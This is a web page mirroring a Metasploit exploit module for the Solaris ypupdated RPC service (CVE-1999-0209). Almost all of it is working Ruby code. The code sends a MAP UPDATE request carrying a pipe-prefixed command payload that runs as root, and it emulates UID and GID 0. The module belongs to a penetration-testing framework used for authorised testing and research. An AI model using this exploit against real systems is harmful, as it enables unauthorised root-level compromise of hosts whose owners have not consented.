Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'English'
7
class MetasploitModule < Msf::Exploit::Remote
8
Rank = ExcellentRanking
9
10
include Msf::Exploit::Remote::SunRPC
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Solaris ypupdated Command Execution',
17
'Description' => %q{
18
This exploit targets a weakness in the way the ypupdated RPC
19
application uses the command shell when handling a MAP UPDATE
20
request. Extra commands may be launched through this command
21
shell, which runs as root on the remote host, by passing
22
commands in the format '|<command>'.
23
24
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
25
ypupdated is started with the '-i' command-line option.
26
},
27
'Author' => [ 'I)ruid <druid[at]caughq.org>' ],
28
'License' => MSF_LICENSE,
29
'References' => [
30
['CVE', '1999-0209'],
31
['OSVDB', '11517'],
32
['BID', '1749'],
33
],
34
'Privileged' => true,
35
'Platform' => %w[solaris unix],
36
'Arch' => ARCH_CMD,
37
'Payload' => {
38
'Space' => 1024,
39
'DisableNops' => true,
40
'Compat' => {
41
'PayloadType' => 'cmd',
42
'RequiredCmd' => 'generic perl telnet'
43
}
44
},
45
'Targets' => [ ['Automatic', {}], ],
46
'DefaultTarget' => 0,
47
'DisclosureDate' => '1994-12-12',
48
'Notes' => {
49
'Stability' => [CRASH_SAFE],
50
'Reliability' => [REPEATABLE_SESSION],
51
'SideEffects' => [IOC_IN_LOGS]
52
}
53
)
54
)
55
56
register_options([
57
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
58
OptInt.new('GID', [false, 'GID to emulate', 0]),
59
OptInt.new('UID', [false, 'UID to emulate', 0])
60
])
61
end
62
63
def exploit
64
hostname = datastore['HOSTNAME']
65
program = 100028
66
progver = 1
67
procedure = 1
68
69
print_status('Sending PortMap request for ypupdated program')
70
sunrpc_create('udp', program, progver)
71
72
print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
73
print_status('Waiting for response...')
74
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
75
command = '|' + payload.encoded
76
msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
77
sunrpc_call(procedure, msg)
78
79
sunrpc_destroy
80
81
print_status('No Errors, appears to have succeeded!')
82
rescue ::Rex::Proto::SunRPC::RPCTimeout
83
print_warning('Warning: ' + $ERROR_INFO)
84
end
85
end
86
87